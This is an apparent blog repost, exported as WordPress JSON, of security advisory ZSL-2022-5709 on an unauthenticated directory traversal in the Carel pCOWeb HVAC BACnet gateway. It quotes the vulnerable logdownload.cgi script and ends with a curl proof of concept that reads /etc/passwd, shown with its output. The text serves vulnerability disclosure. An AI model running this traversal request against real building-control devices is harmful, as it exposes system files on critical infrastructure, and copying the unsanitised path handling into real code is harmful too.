{"id":26370,"date":"2022-07-01T19:38:45","date_gmt":"2022-07-01T15:38:45","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167684\/ZSL-2022-5709.txt"},"modified":"2022-07-04T12:06:03","modified_gmt":"2022-07-04T07:36:03","slug":"carel-pcoweb-hvac-bacnet-gateway-2-1-0-unauthenticated-directory-traversal","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/carel-pcoweb-hvac-bacnet-gateway-2-1-0-unauthenticated-directory-traversal\/","title":{"rendered":"Carel pCOWeb HVAC BACnet Gateway 2.1.0 Unauthenticated Directory Traversal"},"content":{"rendered":"<p dir=\"ltr\">\nCarel pCOWeb HVAC BACnet Gateway 2.1.0 Unauthenticated Directory Traversal<\/p>\n<p dir=\"ltr\">Vendor: CAREL INDUSTRIES S.p.A.<br \/>\nProduct web page: https:\/\/www.carel.com<br \/>\nAffected version: Firmware: A2.1.0 &#8211; B2.1.0<br \/>\nApplication Software: 2.15.4A<br \/>\nSoftware version: v16 13020200<\/p>\n<p dir=\"ltr\">Summary: pCO sistema is the solution CAREL offers its customers for managing HVAC\/R<br \/>\napplications and systems. It consists of programmable controllers, user interfaces,<br \/>\ngateways and communication interfaces, remote management systems to offer the OEMs<br \/>\nworking in HVAC\/R a control system that is powerful yet flexible, can be easily interfaced<br \/>\nto the more widely-used Building Management Systems, and can also be integrated into<br \/>\nproprietary supervisory systems.<\/p>\n<p dir=\"ltr\">Desc: The device suffers from an unauthenticated arbitrary file disclosure vulnerability.<br \/>\nInput passed through the &#8216;file&#8217; GET parameter through the &#8216;logdownload.cgi&#8217; Bash script<br \/>\nis not properly verified before being used to download log files. This can be exploited<br \/>\nto disclose the contents of arbitrary and sensitive files via directory traversal attacks.<\/p>\n<p dir=\"ltr\">=======================================================================================<br \/>\n\/usr\/local\/www\/usr-cgi\/logdownload.cgi:<br \/>\n&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<\/p>\n<p dir=\"ltr\">01: #!\/bin\/bash<br \/>\n02:<br \/>\n03: if [ &#8220;$REQUEST_METHOD&#8221; = &#8220;POST&#8221; ]; then<br \/>\n04: read QUERY_STRING<br \/>\n05: REQUEST_METHOD=GET<br \/>\n06: export REQUEST_METHOD<br \/>\n07: export QUERY_STRING<br \/>\n08: fi<br \/>\n09:<br \/>\n10: LOGDIR=&#8221;\/usr\/local\/root\/flash\/http\/log&#8221;<br \/>\n11:<br \/>\n12: tmp=${QUERY_STRING%&#8221;$&#8221;*}<br \/>\n13: cmd=${tmp%&#8221;=&#8221;*}<br \/>\n14: if [ &#8220;$cmd&#8221; = &#8220;dir&#8221; ]; then<br \/>\n15: PATHCURRENT=$LOGDIR\/${tmp#*&#8221;=&#8221;}<br \/>\n16: else<br \/>\n17: PATHCURRENT=$LOGDIR<br \/>\n18: fi<br \/>\n19:<br \/>\n20: tmp=${QUERY_STRING#*&#8221;$&#8221;}<br \/>\n21: cmd=${tmp%&#8221;=&#8221;*}<br \/>\n22: if [ &#8220;$cmd&#8221; = &#8220;file&#8221; ]; then<br \/>\n23: FILECURRENT=${tmp#*&#8221;=&#8221;}<br \/>\n24: else<br \/>\n25: if [ -f $PATHCURRENT\/lastlog.csv.gz ]; then<br \/>\n26: FILECURRENT=lastlog.csv.gz<br \/>\n27: else<br \/>\n28: FILECURRENT=lastlog.csv<br \/>\n29: fi<br \/>\n30: fi<br \/>\n31:<br \/>\n32: if [ ! -f $PATHCURRENT\/$FILECURRENT ]; then<br \/>\n33: echo -ne &#8220;Content-type: text\/html\\r\\nCache-Control: no-cache\\r\\nExpires: -1\\r\\n\\r\\n&#8221;<br \/>\n34: cat carel.inc.html<br \/>\n35: echo &#8220;&lt;center&gt;File not available!&lt;\/center&gt;&#8221;<br \/>\n36: cat carel.bottom.html<br \/>\n37: exit<br \/>\n38: fi<br \/>\n39:<br \/>\n40: if [ -z $(echo $FILECURRENT | grep -i gz ) ]; then<br \/>\n41: if [ -z $(echo $FILECURRENT | grep -i bmp ) ]; then<br \/>\n42: if [ -z $(echo $FILECURRENT | grep -i svg ) ]; then<br \/>\n43: echo -ne &#8220;Content-Type: text\/csv\\r\\n&#8221;<br \/>\n44: else<br \/>\n45: echo -ne &#8220;Content-Type: image\/svg+xml\\r\\n&#8221;<br \/>\n46: fi<br \/>\n47: else<br \/>\n48: echo -ne &#8220;Content-Type: image\/bmp\\r\\n&#8221;<br \/>\n49: fi<br \/>\n50: else<br \/>\n51: echo -ne &#8220;Content-Type: application\/x-gzip\\r\\n&#8221;<br \/>\n52: fi<br \/>\n53: echo -ne &#8220;Content-Disposition: attachment; filename=$FILECURRENT\\r\\n\\r\\n&#8221;<br \/>\n54:<br \/>\n55: cat $PATHCURRENT\/$FILECURRENT<\/p>\n<p dir=\"ltr\">=======================================================================================<\/p>\n<p dir=\"ltr\">Tested on: GNU\/Linux 4.11.12 (armv7l)<br \/>\nthttpd\/2.29<\/p>\n<p dir=\"ltr\">Vulnerability discovered by Gjoko &#8216;LiquidWorm&#8217; Krstic<br \/>\n@zeroscience<\/p>\n<p dir=\"ltr\">Advisory ID: ZSL-2022-5709<br \/>\nAdvisory URL: https:\/\/www.zeroscience.mk\/en\/vulnerabilities\/ZSL-2022-5709.php<\/p>\n<p dir=\"ltr\">10.05.2022<\/p>\n<p dir=\"ltr\">&#8212;<\/p>\n<p dir=\"ltr\">$ curl -s http:\/\/10.0.0.3\/usr-cgi\/logdownload.cgi?file=..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd<\/p>\n<p dir=\"ltr\">root:x:0:0:root:\/root:\/bin\/sh<br \/>\ndaemon:x:1:1:daemon:\/usr\/sbin:\/bin\/false<br \/>\nbin:x:2:2:bin:\/bin:\/bin\/false<br \/>\nsys:x:3:3:sys:\/dev:\/bin\/false<br \/>\nsync:x:4:100:sync:\/bin:\/bin\/sync<br \/>\nmail:x:8:8:mail:\/var\/spool\/mail:\/bin\/false<br \/>\nwww-data:x:33:33:www-data:\/var\/www:\/bin\/false<br \/>\noperator:x:37:37:Operator:\/var:\/bin\/false<br \/>\nnobody:x:65534:65534:nobody:\/home:\/bin\/false<br \/>\nguest:x:502:101::\/home\/guest:\/bin\/bash<br \/>\ncarel:x:500:500:Carel:\/home\/carel:\/bin\/bash<br \/>\nhttp:x:48:48:HTTP users:\/usr\/local\/www\/http:\/bin\/false<br \/>\nhttpadmin:x:200:200:httpadmin:\/usr\/local\/www\/http:\/bin\/bash<br \/>\nsshd:x:1000:1001:SSH drop priv user:\/:\/bin\/false<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Carel pCOWeb HVAC BACnet Gateway 2.1.0 Unauthenticated Directory Traversal Vendor: CAREL INDUSTRIES S.p.A. Product web page: https:\/\/www.carel.com Affected version: Firmware: A2.1.0 &#8211; B2.1.0 Application Software: 2.15.4A Software version: v16 13020200 Summary: pCO sistema is the solution CAREL offers its customers for managing HVAC\/R applications and systems. It consists of programmable controllers, user interfaces, gateways and &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-26370","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/26370","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=26370"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/26370\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=26370"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=26370"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=26370"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}